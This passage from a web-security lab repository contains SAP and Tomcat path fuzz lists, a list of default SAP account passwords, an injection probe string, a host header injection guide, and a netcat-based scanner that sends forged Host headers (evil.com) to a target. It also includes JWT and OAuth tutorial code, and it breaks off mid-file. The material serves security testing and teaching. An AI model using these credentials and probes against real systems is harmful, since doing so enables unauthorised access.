templates/gk_eshoptrix_2/ 9 | templates/gk_gomuproject/ 10 | templates/gk_icki_sports/ 11 | templates/gk_musictop/ 12 | templates/ja_purity/ 13 | templates/ja_rochea/ 14 | templates/ja_teline_ii/ 15 | templates/joomlaport_metro/ 16 | templates/js_relevant/ 17 | templates/mynxx_j15/ 18 | templates/planets/ 19 | templates/planetsv2/ 20 | templates/rhuk_milkyway/ 21 | templates/rt_hivemind_j15/ 22 | templates/rt_mediamogul_essentials_j15/ 23 | templates/rt_nexus_j15/ 24 | templates/siteground99/ 25 | templates/siteground-j15-14/ 26 | templates/siteground-j15-68/ 27 | templates/siteground-j15-86/ 28 | templates/system/ 29 | templates/yoo_phoenix/ 30 | templates/yoo_waybeyond/ 31 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/sap/sap.fuzz.txt: -------------------------------------------------------------------------------- 1 | /sap/bc/gui/sap/its/webgui 2 | /sap/public/icman/ping 3 | /sap/admin 4 | /sap/public/info 5 | /sap/wdisp/admin 6 | /scripts/wgate 7 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/sap/sap_common.txt: -------------------------------------------------------------------------------- 1 | sapservice 2 | sapadm 3 | adm 4 | sqd 5 | sapdb 6 | 7 | sapservice 8 | sapr3 9 | sapsr3 10 | ora 11 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/sap/sap_default.txt: -------------------------------------------------------------------------------- 1 | SAP* 06071992 2 | SAP* PASS 3 | DDIC 19920706 4 | DDIC Welcome01 5 | SAPCPIC ADMIN 6 | EARLYWATCH SUPPORT 7 | TMSADM PASSWORD 8 | TMSADM ADMIN 9 | TMSADM $1Pawd2& 10 | ADMIN welcome 11 | ADSUSER ch4ngeme 12 | ADS_AGENT ch4ngeme 13 | DEVELOPER ch4ngeme 14 | J2EE_ADMIN ch4ngeme 15 | SAPJSF ch4ngeme 16 | SAPR3 SAP 17 | CTB_ADMIN sap123 18 | XMI_DEMO sap123 19 | IDEADM admin 20 | SMD_ADMIN init1234 21 | SMD_BI_RFC init1234 22 | SMD_RFC init1234 23 | SOLMAN_ADMIN init1234 24 | SOLMAN_BTC init1234 25 | SAPSUPPORT init1234 26 | CONTENTSERV init1234 27 | SMD_AGT init1234 28 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/tomcat/apachetomcat.fuzz.txt: -------------------------------------------------------------------------------- 1 | /examples 2 | /examples/jsp/index.html 3 | /examples/jsp/snp/snoop.jsp 4 | /examples/jsp/source.jsp 5 | /examples/servlet/HelloWorldExample 6 | /examples/servlet/SnoopServlet 7 | /examples/servlet/TroubleShooter 8 | /examples/servlet/default/jsp/snp/snoop.jsp 9 | /examples/servlet/default/jsp/source.jsp 10 | /examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 11 | /examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 12 | /examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 13 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 14 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 15 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 16 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 17 | /examples/servlet/snoop 18 | /examples/servlets/index.html 19 | /jsp-examples 20 | /manager 21 | /manager/deploy?path=foo 22 | /manager/html/ 23 | /servlet/default/ 24 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 25 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 26 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 27 | /servlet/org.apache.catalina.servlets.DefaultServlet/ 28 | /servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 29 | /servlet/org.apache.catalina.servlets.HTMLManagerServlet 30 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 31 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 32 | /servlet/org.apache.catalina.servlets.ManagerServlet 33 | /servlet/org.apache.catalina.servlets.SnoopAllServlet 34 | /servlet/org.apache.catalina.servlets.WebdavServlet/ 35 | /tomcat-docs 36 | /webdav 37 | /webdav/index.html 38 | /webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 39 | /webdav/servlet/webdav/ 40 | /conf/ 41 | /conf/server.xml/ 42 | /WEB-INF/ 43 | /WEB-INF/web.xml 44 | /WEB-INF/classes/ 45 | /shared/ 46 | /shared/lib/ 47 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/tomcat/tomcat-2.txt: -------------------------------------------------------------------------------- 1 | examples 2 | examples/jsp/index.html 3 | examples/servlets/index.html 4 | examples/servlet/HelloWorldExample 5 | examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 6 | examples/servlet/snoop 7 | examples/servlet/SnoopServlet 8 | examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 9 | examples/servlet/TroubleShooter 10 | examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 11 | examples/jsp/snp/snoop.jsp 12 | examples/jsp/source.jsp 13 | servlet/default/ 14 | servlet/org.apache.catalina.servlets.DefaultServlet/ 15 | examples/servlet/default/jsp/snp/snoop.jsp 16 | examples/servlet/default/jsp/source.jsp 17 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 18 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 19 | manager 20 | tomcat-docs 21 | webdav 22 | webdav/index.html 23 | webdav/servlet/webdav/ 24 | webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 25 | servlet/org.apache.catalina.servlets.WebdavServlet/ 26 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 27 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 28 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 29 | servlet/org.apache.catalina.servlets.SnoopAllServlet 30 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 31 | servlet/org.apache.catalina.servlets.ManagerServlet 32 | servlet/org.apache.catalina.servlets.HTMLManagerServlet 33 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 34 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 35 | servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 36 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 37 | ?a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c=1 38 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/wordpress/wordpress_detector.txt: -------------------------------------------------------------------------------- 1 | wp-admin/js/common.js 2 | wp-includes/js/jquery/jquery.js 3 | wp-includes/js/wp-lists.js 4 | wp-includes/js/plupload/plupload.js 5 | wp-includes/css/admin-bar.css -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/img/directory-image.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/directory-traversal/directory-payload-list/img/directory-image.jpg -------------------------------------------------------------------------------- /file-upload-vulnerabilities/How to Exploit File Upload Vulnerabilities (and How to Fix Them!) we45 Blogs.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/file-upload-vulnerabilities/How to Exploit File Upload Vulnerabilities (and How to Fix Them!) we45 Blogs.pdf -------------------------------------------------------------------------------- /file-upload-vulnerabilities/file-upload.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ## What are file upload vulnerabilities? 5 | File upload vulnerabilities are when a web server allows users to upload files to its filesystem without sufficiently validating things like their name, type, contents, or size. Failing to properly enforce restrictions on these could mean that even a basic image upload function can be used to upload arbitrary and potentially dangerous files instead. This could even include server-side script files that enable remote code execution. 6 | 7 | > In some cases, the act of uploading the file is in itself enough to cause damage. Other attacks may involve a follow-up HTTP request for the file, typically to trigger its execution by the server. 8 | 9 | - https://www.we45.com/post/how-to-exploit-file-upload-vulnerabilities-and-how-to-fix-them 10 | - https://portswigger.net/web-security/file-upload 11 | - https://0xn3va.gitbook.io/cheat-sheets/web-application/file-upload-vulnerabilities 12 | -------------------------------------------------------------------------------- /http-host-header-injection/HTTP-Host-Header-Injection.md: -------------------------------------------------------------------------------- 1 | # Host Header Injection 2 | 3 | ## Introduction 4 | HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks. 5 | 6 | ## Where to find 7 | In the feature where the website can send email to us. For example forgot password / newsletter. 8 | 9 | ## How to exploit 10 | 1. Change the host header 11 | ``` 12 | GET /index.php HTTP/1.1 13 | Host: evil-website.com 14 | ... 15 | ``` 16 | 2. Duplicating the host header 17 | ``` 18 | GET /index.php HTTP/1.1 19 | Host: vulnerable-website.com 20 | Host: evil-website.com 21 | ... 22 | ``` 23 | 3. Add line wrapping 24 | ``` 25 | GET /index.php HTTP/1.1 26 | Host: vulnerable-website.com 27 | Host: evil-website.com 28 | ... 29 | ``` 30 | 4. Add host override headers 31 | ``` 32 | X-Forwarded-For: evil-website.com 33 | X-Forwarded-Host: evil-website.com 34 | X-Client-IP: evil-website.com 35 | X-Remote-IP: evil-website.com 36 | X-Remote-Addr: evil-website.com 37 | X-Host: evil-website.com 38 | ``` 39 | How to use? In this case im using "X-Forwarded-For : evil.com" 40 | ``` 41 | GET /index.php HTTP/1.1 42 | Host: vulnerable-website.com 43 | X-Forwarded-For : evil-website.com 44 | ... 45 | ``` 46 | 5. Supply an absolute URL 47 | ``` 48 | GET https://vulnerable-website.com/ HTTP/1.1 49 | Host: evil-website.com 50 | ... 51 | ``` 52 | 53 | ## References 54 | * [PortSwigger](https://portswigger.net/web-security/host-header/exploiting) 55 | -------------------------------------------------------------------------------- /http-host-header-injection/Host-Header-Attack-Test/Host-Header-Vulnerability-Detection.py: -------------------------------------------------------------------------------- 1 | import os 2 | import fileinput 3 | from termcolor import colored 4 | import commands 5 | 6 | 7 | 8 | def MakeCommand(line,domain): 9 | command = r"""echo "GET %s HTTP/1.1\r\nHost:evil.com\r\n\r\n" | netcat %s 80 """ % (str(line), str(domain)) 10 | return command 11 | 12 | 13 | 14 | 15 | website = raw_input("Enter Site Address : ") 16 | 17 | if '//' in website: 18 | domain = website.split("//") 19 | domain = domain[1] 20 | else: 21 | domain = website 22 | website = 'http://' + website 23 | if (not os.path.isfile('results/' + str(domain) + '.txt')): 24 | os.mknod('results/' + str(domain) + '.txt') 25 | print "web crawling start ..." 26 | os.system('python crawler.py -d 20 -l ' + str(website) + ' > sitepath.txt') 27 | print "web crawling end ..." 28 | 29 | for line in fileinput.input(['sitepath.txt']): 30 | line = line.strip() 31 | line = line.split(" ") 32 | line = line[1] 33 | command = MakeCommand(line, domain) 34 | x= commands.getstatusoutput(command) 35 | if "evil.com" in x[1]: 36 | print colored('[-] '+str(line) + ' ----> vulnerable', 'red') 37 | with open('results/' + str(domain) + '.txt', "a") as myfile: 38 | myfile.write(str(line)+'\n') 39 | else: 40 | print colored('[+] '+str(line), 'green') 41 | 42 | for line in fileinput.input(['mycrawler.txt']): 43 | line = line.strip() 44 | command = MakeCommand(line, domain) 45 | x= commands.getstatusoutput(command) 46 | if "evil.com" in x[1]: 47 | print colored('[-] '+str(line) + ' ----> vulnerable', 'red') 48 | with open('results/' + str(domain) + '.txt', "a") as myfile: 49 | myfile.write(str(line)+'\n') 50 | else: 51 | print colored('[+] '+str(line), 'green') 52 | print 'save in results/' + str(domain) + '.txt' 53 | -------------------------------------------------------------------------------- /http-host-header-injection/Host-Header-Attack-Test/README.md: -------------------------------------------------------------------------------- 1 | ![alt text](http://uupload.ir/files/54lo_website-security.png "WEBSecurity") 2 | ## Host Header Attack Test - Description (Acunetix) 3 | In many cases, developers are trusting the HTTP Host header value and using it to generate links, import scripts and even generate password resets links with its value. This is a very bad idea, because the HTTP Host header can be controlled by an attacker. This can be exploited using web-cache poisoning and by abusing alternative channels like password reset emails. 4 | ##Install 5 | please Installing python 2.7 or higher, for example, in centos 6.3, see the link below
6 | [Installing python 2.7 on centos 6.3](https://github.com/h2oai/h2o-2/wiki/installing-python-2.7-on-centos-6.3.-follow-this-sequence-exactly-for-centos-machine-only)

7 | 8 | in linux terminal :
9 | 1. `git clone https://github.com/keramatAlijani/Host-Header-Attack-Test.git`
10 | 2. `cd Host-Header-Attack-Test`
11 | 3. `pip install -r requirements.txt`

12 | if You are using pip version 7.1.0, You should consider upgrading via the `pip install --upgrade pip` command 13 | 14 | ##Usage 15 | 1. `python Host-Header-Vulnerability-Detection.py`
16 | 2. type your domain
17 | 3. Wait until the process is completed and see results directory
18 | 19 | ##Remediation (Acunetix) 20 | The web application should use the SERVER_NAME instead of the Host header. It should also create a dummy vhost that catches all requests with unrecognized Host headers. This can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalNam 21 | 22 | ##contact with me 23 | Email : keramat.alijani@aut.ac.ir
24 | 25 | 26 | -------------------------------------------------------------------------------- /http-host-header-injection/Host-Header-Attack-Test/mycrawler.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /http-host-header-injection/Host-Header-Attack-Test/requirements.txt: -------------------------------------------------------------------------------- 1 | termcolor 2 | re 3 | urlparse 4 | optparse 5 | hashlib 6 | cgi 7 | traceback 8 | bs4 9 | -------------------------------------------------------------------------------- /http-host-header-injection/Host-Header-Attack-Test/results/New Text Document.txt: -------------------------------------------------------------------------------- 1 | keramatAlijani/Host-Header-Attack-Test 2 | -------------------------------------------------------------------------------- /http-host-header-injection/Host-Header-Attack-Test/sitepath.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | _**Please read** our_ 2 | [**contribution guide**](https://github.com/dwyl/contributing) 3 | (_thank you_!) 4 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2016 Do What You Love (DWYL) 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 4 | 5 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 6 | 7 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 8 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/Procfile: -------------------------------------------------------------------------------- 1 | web: node example/server.js 2 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/example/server.js: -------------------------------------------------------------------------------- 1 | var port = process.env.PORT || 1337; // let heroku define port or use 1337 2 | var http = require('http'); // core node.js http (no frameworks) 3 | var url = require('url'); // core node.js url (no frameworks) 4 | var app = require('./lib/helpers'); // auth, token verification & render helpers 5 | var c = function(res){ /* */ }; 6 | 7 | http.createServer(function (req, res) { 8 | var path = url.parse(req.url).pathname; 9 | if( path === '/' || path === '/home' ) { app.home(res); } // homepage 10 | else if( path === '/auth') { app.handler(req, res); } // authenticator 11 | else if( path === '/private') { app.validate(req, res, app.done); } // private content 12 | else if( path === '/logout') { app.logout(req, res, app.done); } // end session 13 | else if( path === '/exit') { app.exit(res); } // for testing ONLY 14 | else { app.notFound(res); } // 404 error 15 | }).listen(port); 16 | 17 | console.log("Visit: http://127.0.0.1:" + port); 18 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/example/test/mock.js: -------------------------------------------------------------------------------- 1 | // both the request and response http objects are event emitters 2 | var events = require('events'); // lets use the core node.js event emmitter 3 | var req = new events.EventEmitter(); // gives us req.emit and req.on('data') 4 | var res = new events.EventEmitter(); // gives us res.emit and req.on('data') 5 | 6 | // mock methods for http request & response 7 | // request should have: 8 | // req.headers 9 | // just set the desired headers object before invoking the function 10 | // here are a few defaults 11 | req.headers = { 12 | 'Content-Type': 'text/html', 13 | 'user-agent': 'Mozilla/5.0', 14 | } 15 | 16 | // req.method e.g: POST or GET 17 | // default to POST cause our check is for this method in authHandler 18 | req.method = 'POST'; 19 | 20 | // req.on('data' ... borrowed from event emitter (see above) 21 | // req.on('end' ... event emitter (again) 22 | // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 23 | 24 | // response shoud have 25 | // res.writeHead( 26 | res.writeHead = function(status, headers) { 27 | res = res || {}; 28 | res.headers = headers; 29 | res.status = status; 30 | return res; 31 | } 32 | 33 | // res.end( 34 | res.end = function(str) { 35 | res = res || {}; 36 | res.body = str; 37 | return res; 38 | } 39 | 40 | 41 | module.exports = { 42 | req : req, 43 | res : res 44 | } 45 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/example/views/fail.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Authentication with JSON Web Tokens 7 | 8 | 9 | 10 |

Try again...

11 |
12 | 13 | 14 | 15 | 16 | 17 |
18 | 19 |

Hint:

20 |
    21 |
  • username: masterbuilder
    • 22 |
  • password: itsnosecret
    • 23 |
24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/example/views/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Authentication with JSON Web Tokens 7 | 8 | 9 | 10 | 11 |

Login to see amazing content:

12 |
13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/example/views/restricted.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Authenticated! 7 | 8 | 9 | 10 |

You Authenticated!

11 | 12 |
13 | 14 | 15 |
16 | 17 | 18 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "learn-json-web-tokens", 3 | "version": "1.0.6", 4 | "description": "A JSON Web Tokens Tutorial to secure your node.js apps!", 5 | "main": "server.js", 6 | "scripts": { 7 | "functional": "istanbul cover ./node_modules/tape/bin/tape ./example/test/functional.js | tap-spec", 8 | "coverage": "istanbul cover ./node_modules/tape/bin/tape ./example/test/functional.js && istanbul check-coverage --statements 100 --functions 100 --lines 100 --branches 100", 9 | "spec": "tape ./example/test/integration.js | tap-spec", 10 | "test": "istanbul cover ./node_modules/tape/bin/tape ./example/test/functional.js", 11 | "start": "node ./example/server.js", 12 | "jshint": "jshint -c .jshintrc --exclude-path .gitignore ." 13 | }, 14 | "repository": { 15 | "type": "git", 16 | "url": "https://github.com/dwyl/learn-json-web-tokens.git" 17 | }, 18 | "keywords": [ 19 | "JSON", 20 | "Web", 21 | "Tokens", 22 | "JWT", 23 | "Security" 24 | ], 25 | "author": "@nelsonic (https://github.com/nelsonic)", 26 | "license": "ISC", 27 | "bugs": { 28 | "url": "https://github.com/dwyl/learn-json-web-tokens/issues" 29 | }, 30 | "homepage": "https://github.com/dwyl/learn-json-web-tokens", 31 | "dependencies": { 32 | "jsonwebtoken": "^8.5.1", 33 | "level": "^5.0.1" 34 | }, 35 | "devDependencies": { 36 | "istanbul": "^0.4.3", 37 | "jshint": "^2.8.0", 38 | "pre-commit": "^1.0.10", 39 | "request": "^2.60.0", 40 | "tap-spec": "^5.0.0", 41 | "tape": "^4.0.1" 42 | }, 43 | "engines": { 44 | "node": ">= 6" 45 | }, 46 | "pre-commit": [ 47 | "jshint", 48 | "coverage" 49 | ] 50 | } 51 | -------------------------------------------------------------------------------- /local-remote-file-inclusion/rfi-lfi-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /local-remote-file-inclusion/rfi-lfi-payload-list/img/rfi-lfi.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/local-remote-file-inclusion/rfi-lfi-payload-list/img/rfi-lfi.jpeg -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/jsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "baseUrl": "src" 4 | }, 5 | "include": ["src"] 6 | } 7 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/nodemon.json: -------------------------------------------------------------------------------- 1 | { 2 | "ignore": ["build/*", "node_modules/**/node_modules"] 3 | } 4 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "api", 3 | "version": "1.0.0", 4 | "private": true, 5 | "author": "Atul Yadav ", 6 | "scripts": { 7 | "seed": "babel-node src/setup/server/seeder.js", 8 | "setup": "npm install && npm run seed", 9 | "start": "nodemon src/index.js --exec babel-node", 10 | "start:prod": "npm run build:prod && npm run start:server", 11 | "build:prod": "babel src -s -D -d build", 12 | "start:server": "node build/index.js" 13 | }, 14 | "husky": { 15 | "hooks": { 16 | "pre-commit": "pretty-quick --staged" 17 | } 18 | }, 19 | "dependencies": { 20 | "axios": "^0.27.2", 21 | "bcrypt": "5.0.1", 22 | "body-parser": "1.20.0", 23 | "cors": "2.8.5", 24 | "dotenv": "16.0.1", 25 | "express": "4.18.1", 26 | "fullstack-validator": "^1.0.0", 27 | "ip": "1.1.8", 28 | "jsonwebtoken": "8.5.1", 29 | "lodash": "4.17.21", 30 | "moment": "^2.29.3", 31 | "mongoose": "6.3.3", 32 | "morgan": "1.10.0", 33 | "multer": "1.4.4" 34 | }, 35 | "devDependencies": { 36 | "@babel/cli": "7.17.10", 37 | "@babel/core": "7.17.12", 38 | "@babel/node": "7.17.10", 39 | "@babel/plugin-proposal-class-properties": "^7.17.12", 40 | "@babel/plugin-transform-runtime": "7.17.12", 41 | "@babel/preset-env": "7.17.12", 42 | "@babel/runtime": "7.17.9", 43 | "babel-plugin-module-resolver": "^4.1.0", 44 | "husky": "^4.3.6", 45 | "nodemon": "2.0.16", 46 | "prettier": "2.6.2", 47 | "pretty-quick": "^3.1.3" 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import express from 'express' 3 | 4 | // App Imports 5 | import { connect } from 'setup/server/database' 6 | import middlewares from 'setup/server/middlewares' 7 | import endpoint from 'setup/server/endpoint' 8 | import start from 'setup/server/start' 9 | 10 | // Create express server 11 | const server = express() 12 | 13 | // Connect database 14 | connect() 15 | 16 | // Setup middlewares 17 | middlewares(server) 18 | 19 | // Setup endpoint 20 | endpoint(server) 21 | 22 | // Start server 23 | start(server) 24 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/common/errors.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import params from 'setup/config/params' 3 | 4 | // Auth 5 | class AuthError extends Error { 6 | constructor(message) { 7 | super(message) 8 | 9 | this.code = params.common.errors.auth 10 | } 11 | } 12 | 13 | // Validation 14 | class ValidationError extends Error { 15 | constructor(message) { 16 | super(message) 17 | 18 | this.code = params.common.errors.validation 19 | } 20 | } 21 | 22 | export { AuthError, ValidationError } 23 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/index.js: -------------------------------------------------------------------------------- 1 | // App imports 2 | import query from './query' 3 | import mutation from './mutation' 4 | 5 | export default { 6 | ...query, 7 | ...mutation, 8 | } 9 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/model.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import mongoose, { Schema } from 'mongoose' 3 | 4 | // App imports 5 | import { collection as User } from 'modules/user/model' 6 | 7 | // Collection name 8 | export const collection = 'Note' 9 | 10 | // Schema 11 | const schema = new Schema( 12 | { 13 | userId: { 14 | type: Schema.Types.ObjectId, 15 | ref: User, 16 | required: true, 17 | index: true, 18 | }, 19 | 20 | text: { 21 | type: String, 22 | required: true, 23 | }, 24 | 25 | isDeleted: { 26 | type: Boolean, 27 | required: true, 28 | default: false, 29 | index: true, 30 | }, 31 | }, 32 | { timestamps: true }, 33 | ) 34 | 35 | // Model 36 | export default mongoose.model(collection, schema, collection) 37 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/mutation/index.js: -------------------------------------------------------------------------------- 1 | // App imports 2 | import noteSave from './save' 3 | import noteRemove from './remove' 4 | 5 | // Mutations 6 | export default { 7 | noteSave, 8 | noteRemove, 9 | } 10 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/mutation/remove.js: -------------------------------------------------------------------------------- 1 | // App imports 2 | import { authCheck } from 'setup/helpers/utils' 3 | import v from 'setup/helpers/validation' 4 | import { AuthError, ValidationError } from 'modules/common/errors' 5 | import Note from 'modules/note/model' 6 | 7 | // Remove 8 | export default async function remove({ params: { noteId }, auth }) { 9 | if (authCheck(auth)) { 10 | // Validation rules 11 | const rules = [ 12 | { 13 | data: { value: noteId }, 14 | check: 'isNotEmpty', 15 | message: 'Invalid note.', 16 | }, 17 | ] 18 | 19 | // Validate 20 | try { 21 | v.validate(rules) 22 | } catch (error) { 23 | throw new ValidationError(error.message) 24 | } 25 | 26 | try { 27 | // Note 28 | const data = await Note.updateOne( 29 | { _id: noteId }, 30 | { $set: { isDeleted: true } }, 31 | ) 32 | 33 | return { 34 | data, 35 | message: `Note has been removed successfully.`, 36 | } 37 | } catch (error) { 38 | throw new Error(`An error occurred. ${error.message}`) 39 | } 40 | } 41 | 42 | throw new AuthError('You are not authorized to perform this action.') 43 | } 44 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/mutation/save.js: -------------------------------------------------------------------------------- 1 | // App imports 2 | import params from 'setup/config/params' 3 | import { authCheck } from 'setup/helpers/utils' 4 | import v from 